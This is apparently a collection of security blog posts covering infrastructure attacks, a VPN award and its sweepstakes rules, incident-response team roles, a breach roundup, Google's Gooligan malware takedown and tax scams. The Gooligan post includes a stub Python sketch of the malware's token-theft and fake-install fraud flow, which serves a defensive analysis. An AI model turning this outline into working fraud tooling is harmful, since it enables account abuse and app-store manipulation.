Security researchers have long shared their concerns about potential cyberattacks on critical infrastructure systems. Over the past few weeks, there have been several reports highlighting the dangers of such attacks. According to the New York Times, investigators believe that a cyberattack against a petrochemical plant in Saudi Arabia in August last year was intended to not only sabotage the plant’s operations but also cause an explosion that could have killed people. The only thing that reportedly prevented the explosion was a mistake in the computer code used by the attackers. Experts believe that a nation-state attacker was responsible, given that there was no obvious financial motivation from the attack. Also this month, the US accused Russia of a wide-ranging cyber-assault on its energy grid and other parts of its critical infrastructure, with many of the reported tactics resembling the Dragonfly 2.0 campaign, in which hackers infiltrated energy facilities in North America and Europe.

We are at an alarming point in terms of our critical infrastructure security, where governments around the world are on high alert to the potential for damaging attacks. The head of the UK’s National Cyber Security Centre (NCSC) warned in January that he expects the UK to suffer a major, crippling cyberattack against its national critical infrastructure during the next two years.

Nation-state attackers are well aware of the political fallout that could arise from dangerous cyberattacks on control networks, so it is imperative that security issues within these systems are addressed urgently.

Industrial control systems at risk

The National Cyber Security Centre is right to be concerned about potential cyberattacks against UK critical infrastructure. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats, often alleged to be the work of foreign governments seeking to cause everything from mischief to political upheaval. While offering many benefits in terms of productivity and visibility, the greater connectivity arising from the Internet of Things has also exposed many industrial control systems to a range of damaging cyberattacks. For example, DDoS attacks can be used to disrupt the availability of critical services while simultaneously allowing attackers to plant damaging, or as in the Saudi case even weaponized, malware. Last October’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity of cyberattacks to cut off people’s access to essential services. The current cyber security landscape has changed almost beyond recognition: ten years ago, only the most Orwellian futurists would have predicted that major national elections would be manipulated by cyberattacks.

What’s next?

The pressure is now on for the cyber security community and governments to act on this issue and defend against this apparent increase in nation-state attacks. The NIS Directive in the UK and EU and the NIST framework in the US present a golden opportunity to improve critical infrastructure cyber security. But to be truly effective, these regulations must compel operators of essential services to deliver higher levels of cyber security and require that these essential services remain available during an attack. As seen in recent days with Facebook and Cambridge Analytica, it won’t matter if infrastructure operators claim ‘tick-box’ regulatory compliance as their defence if their essential service has failed to remain open for business during a nation-state-sponsored cyberattack.

To find out more, contact us.

McAfee Safe Connect: Two-Time Gold Winner of the 2018 Info Security PG’s Global Excellence Awards®

On February 28th, Info Security Products Guide announced the winners of its 2018 Global Excellence Awards. We are humbled that McAfee Safe Connect received two golds in the Product or Service Excellence of the Year categories: Security Information, and Website & Web Application Security.

Product Overview:

McAfee Safe Connect is a VPN (Virtual Private Network) that helps users create secure online connections while using the internet. Doing so helps our customers minimize their individual security risks and keep their data private, especially when connecting to a public or open Wi-Fi network. Unlike home Wi-Fi, many public Wi-Fi networks (commonly offered at cafés, airports and hotels) aren’t password-protected and don’t encrypt the user data transmitted over them. Therefore, when you connect to a hotspot, your online activities, from your social media activity to your online purchase history and even your bank account credentials, may be wide open to hackers. With McAfee Safe Connect, you can rest assured that your information and online activities are encrypted.

McAfee has a proven record of providing security for consumers in the digital age. To address growing concerns over Wi-Fi security, we created an award-winning VPN that would keep users’ personal information secure from online threats and unsecure networks.

McAfee Safe Connect has over 1 million downloads across Google Play and the App Store with an impressive 4.3-star rating. It is available in over 20 languages to users worldwide.

Tech behemoth Samsung also chose McAfee Safe Connect VPN for their Galaxy Note 8 – Secure Wi-Fi feature and expanded collaboration with its newly announced Galaxy S9 Smartphones.

About Info Security PG’s Global Excellence Awards

Info Security Products Guide sponsors the Global Excellence Awards and plays a vital role in keeping individuals informed of the choices they can make when it comes to protecting their digital resources and assets. The guide is written expressly for those who wish to stay informed about recent security threats and the preventive measures they can take. You will discover a wealth of information in this guide, including tomorrow’s technology today, best deployment scenarios, the people and technologies shaping cyber security, and the industry predictions and directions that help in making the most pertinent security decisions. Visit the guide for the complete list of winners.

We are proud of the recognition given to McAfee Safe Connect, which aims to safeguard every Internet user’s online privacy. Please check out our award-winning Wi-Fi privacy VPN product: McAfee Safe Connect.

Interested in learning more about McAfee Safe Connect and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards® appeared first on McAfee Blogs.

McAfee Safe Connect RT2Win Sweepstakes Terms and Conditions

Just a few weeks back, Info Security Products Guide awarded McAfee Safe Connect two Gold-Level Global Excellence Awards for Product or Service Excellence of the Year: Security Information and Website & Web Application Security!

To celebrate, we’re treating you to a #RT2Win Sweepstakes on the @McAfee_Home Twitter handle. Ten [10] lucky winners of the Sweepstakes drawing will receive a free one-year subscription to McAfee Safe Connect, providing security and privacy across your PC, iOS, and Android devices when connecting to Wi-Fi hotspots and private networks.

All you have to do is retweet one of our contest tweets between March 26, 2018 and April 17, 2018 for your chance to win. Sweepstakes tweets will include “#McAfeeSafeConnect, #RT2Win, and #Sweepstakes”. Terms and conditions below.

#McAfeeSafeConnect #RT2Win Sweepstakes Official Rules

  • To enter, go to, and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, March 26. This tweet will include the hashtags: #McAfeeSafeConnect, #RT2Win, and #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #McAfeeSafeConnect AND #RT2Win hashtags must be included to be entered.
  • Winners will be notified on Wednesday, April 18, 2018 via Twitter direct message.
  • Limit one entry per person.

How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeSafeConnect” for a chance to win a one-year free subscription to McAfee Safe Connect. Ten [10] total winners will be selected and announced on April 18, 2018. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

McAfee Safe Connect #RT2Win Sweepstakes Terms and Conditions

How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Safe Connect #RT2Win Sweepstakes will be conducted from March 26, 2018 through April 17, 2018. All entries for each day of the McAfee Safe Connect #RT2Win Sweepstakes must be received during the time allotted for the McAfee Safe Connect #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Safe Connect #RT2Win Sweepstakes. The McAfee Safe Connect #RT2Win Sweepstakes duration is as follows.

McAfee Safe Connect #RT2Win Sweepstakes Duration:

  • Begins Monday, March 26, 2018­­ at 12:00pm PST
  • Ends: Tuesday, April 17, 2018 at 12:00am PST
  • Ten [10] winners will be announced: Wednesday, April 18th

For the McAfee Safe Connect #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Safe Connect #RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #RT2Win, #Sweepstakes, and #McAfeeSafeConnect.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #RT2Win, #Sweepstakes, and #McAfeeSafeConnect hashtags.
  3. Note: Tweets that do not contain the #RT2Win, #Sweepstakes, and #McAfeeSafeConnect hashtags will not be considered for entry.
  4. Limit one entry per person.

Ten [10] winners will be chosen for the McAfee Safe Connect #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #RT2Win, #Sweepstakes, #McAfeeSafeConnect. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on April 18, 2018 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   


McAfee Safe Connect #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the McAfee Safe Connect #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and the McAfee Safe Connect #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Safe Connect #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of ten [10] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Safe Connect #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter by April 18th. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten [10] days of written notification, or the prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if a potential winner cannot be reached within twenty-four [24] hours from the first DM notification attempt, if a potential winner fails to return the requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.


The prize for the McAfee Safe Connect #RT2Win Sweepstakes is a one-year free subscription to McAfee Safe Connect. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Safe Connect #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Safe Connect #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Safe Connect #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Safe Connect #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Safe Connect #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Safe Connect #RT2Win Sweepstakes-related activity, or participation in the McAfee Safe Connect #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee Safe Connect #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Safe Connect #RT2Win Sweepstakes.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Safe Connect #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Safe Connect #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with these sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy: 

Personal information obtained in connection with this McAfee Safe Connect #RT2Win Sweepstakes will be handled in accordance with the policy set forth at

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after March 26th 2018 and before April 17th 2018 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post McAfee Safe Connect RT2Win Sweepstakes Terms and Conditions appeared first on McAfee Blogs.

CERTs, CSIRTs and SOCs: 10 years after the definitions

Nowadays it is hard to draw sharp distinctions between Security Operation Centers (SOC), Computer Emergency Response Teams (CERT) and Computer Security Incident Response Teams (CSIRT), since the terms are widely used across organisations performing very similar, closely related tasks. Robin Ruefle (2007), in her paper titled "Defining Computer Security Incident Response Teams" (available here), gave us a good starting point. She also admits (at the end of the paper) that there is no strong difference between the common terms CSIRT, CERT, CSIRC, CIRT and IHT. Her conclusion made me think about how this topic has evolved over the past 10 years.

Building on her work on defining (let me call them) CSIRTs, I would like to give you more detail on how these teams have evolved over the past decade, based on my personal experience in the field. After being involved in building several CERTs, organising CSIRTs and evaluating SOCs, I started to spot strong and weak similarities between these teams. Today I'd like to share those strong and weak similarities with you, without talking about "differences", since there is no real evidence of differences at all.

Each team is called upon when cybersecurity incidents occur, but each holds specific aims and responds in a specific way. Every team needs to understand what happened after a cybersecurity incident, and this is the strongest point they all have in common: deeply understanding what happened. No team is better than, or more dedicated than, another at understanding what really happened during an incident; every team has full autonomy to figure it out through inspection and analytical skills. The weak similarities come after the initial understanding (analysis) phase. CSIRTs and SOCs usually study the incident looking for a response, while a CERT usually tries to forecast incidents. The notion of response highlights the "weak similarities" between CSIRT and SOC.

A CSIRT usually (but not necessarily) looks at the incident from a "business" perspective, taking care of (but not limited to): communication countermeasures, policy creation, insurance calls, business impact analysis, technical skillsets and, of course, technical mitigations. For example, a CSIRT would work with the marketing area to evaluate a communication strategy after a successful incident hits the company, or it could call insurers to evaluate whether they will cover some of the damages, or it could interact with the HR area to identify missing skillsets in the organisation. Of course it is able to interact with defensive technologies, but that is only one of its tasks.

A SOC usually (but not necessarily) looks at the incident from a more "technical" perspective, taking care of (but not limited to): incident forensics, log analysis, vendor calls, patch distribution, vulnerability management and software/hardware tuning. For example, after an incident hits an organisation, its SOC would try to contain it, involving all its resources to block the threat by acting on perimeter devices or running commands directly on users' machines. The SOC deeply understands SIEM technology and is able to improve it; it is also able to use and interact with defensive teams and/or technologies such as sandboxes, proxies and WAFs. The SOC team holds strong network-oriented capabilities.

CERTs usually take care of incidents by following community sharing procedures involving (but not limited to): feeds, bulletins and Indicators of Compromise (IoC), and by applying effective governance actions to local IT/SOC teams, enabling them to mitigate the incident as fast as possible. CERT team members work a lot with global incidents, understanding new threats and tracking the movements of known threats. They usually work with Threat Intelligence Platforms and with high-level dashboards to better understand the evolution of threats and forecast new attacks.
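As a toy illustration of the kind of automation these teams rely on, the sketch below matches locally observed indicators against a shared IoC feed. The feed format, field names, and indicator values here are all hypothetical stand-ins, not any specific platform's API:

```python
# Toy sketch: match locally observed indicators against a shared IoC feed.
# The 'type,value,threat' feed format and all values are hypothetical.

def parse_feed(lines):
    """Parse a simple 'type,value,threat' feed into a lookup table."""
    iocs = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip comments and blank lines
        ioc_type, value, threat = line.split(",", 2)
        iocs[(ioc_type, value)] = threat
    return iocs

def match_observations(iocs, observations):
    """Return (indicator, threat) pairs for every observation found in the feed."""
    return [(obs, iocs[obs]) for obs in observations if obs in iocs]

feed = [
    "# type,value,threat",
    "domain,c2.example,Gooligan C2",
    "sha256,9f86d081884c7d65,Dropper sample",
]
observed = [("domain", "c2.example"), ("ip", "192.0.2.1")]
hits = match_observations(parse_feed(feed), observed)
# hits == [(("domain", "c2.example"), "Gooligan C2")]
```

In practice a CERT would consume structured feeds (for example STIX/TAXII streams) through a Threat Intelligence Platform; the point here is only the matching step that turns shared indicators into local alerts.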

CERTs and SOCs are usually focused on prevention, asking questions such as (but not limited to): what are the best rules to apply? What are the procedures in case of incidents? They are really focused on using threat intelligence to spot attacks and block incidents. On the other hand, CERTs and CSIRTs are mostly focused on guidelines and business impact analysis, while SOCs and CSIRTs really need to follow incident response procedures in order to apply their deep technical skills to mitigate the attack. The following image highlights the main (but not the only) keywords you would probably deal with if you work in a SOC, a CERT or a CSIRT.

The main ideas (but not the only ones) behind the three teams can be summed up in the following terms: Mitigation (belongs to the SOC), Response (belongs to the CSIRT) and Alerting/Prevention (belongs to the CERT). I'd like to point out that mitigation and response are quite different concepts: mitigation takes a technical view of the resolution, while response takes a more business-oriented view. Mitigating an incident means "taking it down" and restoring the attacked system to its pre-incident state, whereas an incident response can include more sophisticated actions, potentially involving the board of directors in the decision process.
Similar teams with such distinct attitudes need different professional profiles. Usually (but again not necessarily) SOC teams need more technical profiles, with hard skills such as vendor certifications, a network-oriented attitude and forensic skills. CSIRT teams need more mixed profiles, oriented to technical skills but also with a business view: risk evaluation, guideline building and communication skills. CERTs need a wide view of the threat landscape, and for that reason they need to know threat intelligence, know prevention tools and be part of strong IoC-sharing communities. Developer skills are not mandatory on these teams, but if "quick and dirty" scripting skills are available, the entire team will benefit from them. Automation and integration are widely needed in such teams, and a scripting profile makes those integrations possible.

As mentioned at the beginning of this post, it is hard, almost impossible, to give hard definitions about the evolution of "CSIRTs", but it is possible to observe strong and weak similarities in order to better understand which team is most suitable for each organisation. If you belong to a "CSIRT", a "SOC" or a "CERT" and you feel like you are doing a little bit of each team's job according to this post, well, that is OK! In ten years things have changed a lot from the original definitions, and it is quite normal to be involved in hybrid teams.

Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including and travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current site was not affected.


Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors compromised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

Facebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting firm Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Taking down Gooligan part 3 — monetization and clean-up

This post provides an in-depth analysis of Gooligan’s monetization schemes and recounts how Google took it down with the help of external partners.

This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.

This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:

You can also get the slides here, but they are pretty bare.


Gooligan’s goal was to monetize the infected devices through two main fraudulent schemes: ad fraud and Android app boosting.

Ad fraud

Gooligan Fraudulent ads pop up

As shown in the screenshot above, Gooligan periodically uses its root privileges to overlay an ad popup for a legitimate app on top of whatever the user is currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.

We don’t have much insight into how effective those ad campaigns were or who was reselling them, as they don’t abuse Google’s ads network and they use a gazillion HTTP redirects, which makes attribution close to impossible. However, we believe that ad fraud was the main driver of Gooligan revenue, given its volume and the fact that we blocked its fake installs, as discussed below.

App Boosting

The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.

Example of Play Store boosting service

The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.

Play Store Fraud Diagram

As illustrated in the diagram above, the app boosting was done in four steps:

  1. Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.

  2. Taking orders: Gooligan reports phone information to the central command and control system and receives a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because the Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.

  3. Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.

  4. Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.
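The four steps above can be sketched as a single flow. Every class, method, and field below is a hypothetical stand-in used to illustrate the sequence of the scheme, not actual Gooligan code or a real Play store API:

```python
# High-level sketch of the four-step boosting flow described above.
# All names and structures here are hypothetical illustrations.

class Device:
    """Stand-in infected device holding a stolen long-term account token."""
    def __init__(self, token, model):
        self.token, self.model = token, model

class CommandServer:
    """Stand-in C2: receives phone info, returns a boosting order."""
    def get_order(self, phone_info):
        return {"query": "flashlight", "app": "com.example.app", "review": "Great!"}

class PlayStoreClient:
    """Stand-in Play client that records the actions performed."""
    def __init__(self):
        self.actions = []
    def exchange(self, long_term_token):
        return "short:" + long_term_token          # short-lived session token
    def search(self, query, token):
        self.actions.append(("search", query))
    def install(self, app, token):
        self.actions.append(("install", app))
    def review(self, app, text, token):
        self.actions.append(("review", app))

def boost(device, c2, store):
    token = device.token                           # 1. token stealing
    order = c2.get_order(device.model)             # 2. taking orders
    short = store.exchange(token)                  # 3. token exchange
    store.search(order["query"], short)            # 4. boosting: search,
    store.install(order["app"], short)             #    install,
    if order.get("review"):
        store.review(order["app"], order["review"], short)  # optional review
    return store.actions
```

The point of the sketch is the ordering: the long-term token is stolen once, but each boosting job re-derives a short-term token and then replays exactly the search/install/review sequence a real user would produce.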


Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post, its reset persistence mechanism meant that a factory reset was not enough to clean up old unpatched devices. Second, the OAuth tokens had been exfiltrated to Gooligan servers.

Asking users to reflash their devices would have been unreasonable, and issuing an OTA (Over The Air) update would have taken too long. Given this difficult context and the need to act quickly to protect our users, we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.


Gooligan sinkhole efficiency chart

With the help of the Shadowserver Foundation and domain registrars, we sinkholed the Gooligan domains and pointed them to Shadowserver-controlled IPs instead of IPs controlled by the Gooligan authors. This sinkholing ensured that infected devices couldn’t exfiltrate tokens or receive fraud commands, as they would connect to the sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: it blocked over 50M attempts to connect to Gooligan’s control server in 2017.


Example of Notifications sent to Gooligan victims

With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:

  • Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.

  • It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.

  • Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.


Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicating this threat paid off: on the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took a mere few days, which is blazing fast compared to other similar efforts; the Avalanche botnet takedown, for example, took four years of intensive work.

To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.

Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser-known, yet still critical, activities that our research team assists with. If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can learn about Gooligan too.

To get notified when my next post is online, follow me on Twitter, Facebook, Google+, or LinkedIn. You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS.

A bientôt!

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard-earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and claim that two certified letters were previously sent and returned as undeliverable. The callers then threaten arrest if the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS).

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot calls (robo calls) or through a phishing email. Bogus IRS robo calls often politely ask taxpayers to verify their identity over the phone. These robo calls will even spoof caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that install malware to collect data.

